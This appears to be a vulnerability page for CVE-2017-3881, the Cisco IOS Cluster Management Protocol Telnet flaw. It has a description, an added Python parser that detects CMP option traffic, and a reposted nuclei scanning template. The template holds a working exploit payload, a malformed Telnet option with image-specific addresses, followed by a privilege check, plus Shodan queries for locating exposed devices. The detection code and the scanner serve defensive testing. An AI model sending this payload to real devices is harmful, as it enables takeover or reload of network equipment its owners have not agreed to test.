Cisco IOS Remote Code Execution Vulnerability

Vulnerability information

Vulnerability name: Cisco IOS Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2017-3881

Vulnerability type: Remote code execution (malformed CMP-specific Telnet option handling)

Severity: Critical

Description: The vulnerability lies in the Cisco Cluster Management Protocol (CMP) processing code of Cisco IOS and Cisco IOS XE Software and allows an unauthenticated remote attacker to reload an affected device or execute code on it with elevated privileges. CMP uses Telnet internally as the signaling and command protocol between cluster members. Two factors combine to create the flaw: (1) the CMP-specific Telnet options are not restricted to internal, local communication between cluster members; they are accepted and processed on any Telnet connection to an affected device; and (2) malformed CMP-specific Telnet options are processed incorrectly. An attacker exploits this by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected device that is configured to accept Telnet connections. Successful exploitation can give the attacker arbitrary code execution and full control of the device, or cause the device to reload. Affected products include Catalyst switches, Embedded Service 2020 switches, the Enhanced Layer 2 EtherSwitch Service Module, the Enhanced Layer 2/3 EtherSwitch Service Module, the Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, the ME 4924-10GE switch, RF Gateway 10, and the SM-X Layer 2/3 EtherSwitch Service Module. The severity comes from the combination of no authentication, no user interaction, and a network-reachable attack surface: anyone who can open a Telnet session to the device can attempt it, and the outcome is either full compromise or a service-disrupting reload.
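The description above is about Telnet option negotiation, so the thing a defender most wants is a way to see CMP option traffic on the wire. The following Python parser is an added example for this page (not code from the nuclei template, from Cisco, or from the cisco-rce repository). It extracts Telnet subnegotiations (IAC SB option ... IAC SE, per RFC 854) from a captured byte stream and raises alerts when the CMP option appears from a non-cluster peer, is oversized, or is left unterminated. The option number 0x24 and the CISCO_KITS marker are taken from the template payload on this page (its hex prefix fffa240003 decodes to IAC SB 0x24 0x00 0x03); the sample stream is constructed to follow that framing with a plain filler instead of the template's address words, and MAX_SANE_CMP_LEN is an assumed threshold, not a value documented by Cisco.

```python
"""Flag CMP-specific Telnet option traffic in a captured Telnet byte stream.

Added example; not part of the nuclei template or the cisco-rce repository.
CMP_OPTION and CMP_MARKER come from the template payload; the sample stream
is constructed and MAX_SANE_CMP_LEN is an assumption.
"""
from dataclasses import dataclass

IAC, SB, SE = 0xFF, 0xFA, 0xF0                 # RFC 854 command bytes
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
CMP_OPTION = 0x24                              # option byte in the template's fffa240003 prefix
CMP_MARKER = b"CISCO_KITS"
MAX_SANE_CMP_LEN = 64                          # assumption: legitimate CMP options are short


@dataclass
class Subneg:
    option: int
    payload: bytes        # bytes between "SB <opt>" and "IAC SE", IAC-unescaped
    terminated: bool      # False if the stream ended before IAC SE


def parse_subnegotiations(stream: bytes) -> list[Subneg]:
    """Extract every IAC SB <opt> ... IAC SE block from a Telnet byte stream.

    Inside a subnegotiation a literal 0xFF travels as IAC IAC and is unescaped
    here. A block that is never closed is still returned, because an attacker
    may omit IAC SE on purpose.
    """
    out: list[Subneg] = []
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC or i + 1 >= n:
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd == SB and i + 2 < n:
            option = stream[i + 2]
            buf = bytearray()
            j, closed = i + 3, False
            while j < n:
                b = stream[j]
                if b != IAC:
                    buf.append(b)
                    j += 1
                elif j + 1 < n and stream[j + 1] == IAC:    # escaped 0xFF data byte
                    buf.append(IAC)
                    j += 2
                elif j + 1 < n and stream[j + 1] == SE:     # end of block
                    j += 2
                    closed = True
                    break
                else:                                       # stray IAC: stop this block here
                    break
            out.append(Subneg(option, bytes(buf), closed))
            i = j
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3                                          # IAC <cmd> <opt>
        else:
            i += 2                                          # IAC IAC or another 2-byte command
    return out


def cmp_alerts(stream: bytes, peer_is_cluster_member: bool = False) -> list[str]:
    """Return alert strings for CMP option use that should not appear on a
    management Telnet session. Whether the peer is a cluster member is an
    input here; in practice it comes from inventory or the cluster config."""
    alerts: list[str] = []
    for sn in parse_subnegotiations(stream):
        if sn.option != CMP_OPTION:
            continue
        if not peer_is_cluster_member:
            alerts.append("CMP telnet option from non-cluster peer")
        if CMP_MARKER in sn.payload and len(sn.payload) > MAX_SANE_CMP_LEN:
            alerts.append(f"oversized CISCO_KITS option ({len(sn.payload)} bytes)")
        if not sn.terminated:
            alerts.append("CMP subnegotiation without IAC SE")
    return alerts


# Constructed sample: a normal terminal-type negotiation followed by a CMP
# option framed like the template's first request (same prefix, marker and
# "2:...:15:" layout, with a plain filler instead of the template's address words).
BENIGN_NEGOTIATION = bytes([IAC, DO, 0x18, IAC, SB, 0x18, 0x00]) + b"xterm" + bytes([IAC, SE])
CMP_REQUEST = (bytes([IAC, SB, CMP_OPTION, 0x00, 0x03]) + CMP_MARKER + b"\x01"
               + b"2:" + b"A" * 116 + b":15:" + bytes([IAC, SE]))
SAMPLE_STREAM = BENIGN_NEGOTIATION + CMP_REQUEST

if __name__ == "__main__":
    for sn in parse_subnegotiations(SAMPLE_STREAM):
        print(f"option 0x{sn.option:02x} payload_len={len(sn.payload)} terminated={sn.terminated}")
    for alert in cmp_alerts(SAMPLE_STREAM):
        print("ALERT:", alert)
```

Feed it the client-to-server bytes of a Telnet session (for example, the TCP payload reassembled from a capture); the parser tolerates the IAC IAC escape so it does not mis-frame binary option data, and it still reports a subnegotiation the sender never closed.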

Vendor: Cisco

Product: Cisco IOS

Search syntax: product:"cisco ios http config", cpe:"cpe:2.3:o:cisco:ios"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2017%2FCVE-2017-3881.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details

Note before running: this template is not a passive version check. Its first request is a live exploit payload in the style of the cisco-rce repository referenced below (the hex words following the run of "A" bytes appear to be image-specific addresses, matching the 12.2(55)SE11 named in the template), and the second request sends "show priv" and matches on "Current privilege level is", which only appears if the malformed option left the attacker with an unauthenticated exec session. On other IOS images the same bytes are more likely to reload the device than to yield a session; note that the Metasploit module in the references is a DoS module. Run it only against lab devices or inside an agreed change window. The remediation is to stop exposing Telnet at all (SSH-only vty lines) or, failing that, to restrict vty access with an ACL.


id: CVE-2017-3881

info:
  name: Cisco IOS 12.2(55)SE11 - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
  remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
  reference:
    - https://github.com/artkond/cisco-rce
    - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3881
    - http://www.securitytracker.com/id/1038059
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-3881
    cwe-id: CWE-20
    epss-score: 0.94083
    epss-percentile: 0.99893
    cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: cisco
    product: ios
    shodan-query:
      - product:"cisco ios http config"
      - cpe:"cpe:2.3:o:cisco:ios"
  tags: cve2017,network,cve,cisco,rce,kev,msf,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:23"

    inputs:
      - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
        read: 1024

      - data: "show priv"
        read: 1024
    read-size: 1024
    matchers:
      - type: word
        words:
          - "Current privilege level is"
# digest: 4a0a00473045022027a392a3f4ae6ca700335ac106802070aee5a351ac084b511a6b865f66cc8753022100fc349039457c6ed1a9b9cb834b5a7e1e2db0d01de5e9930bee77a966ef1a009b:922c64590222798bb761d5b6d8e72950


http://example.com/2025/07/08/github_2850206550/
Author: lianccc
Published: 8 July 2025
License: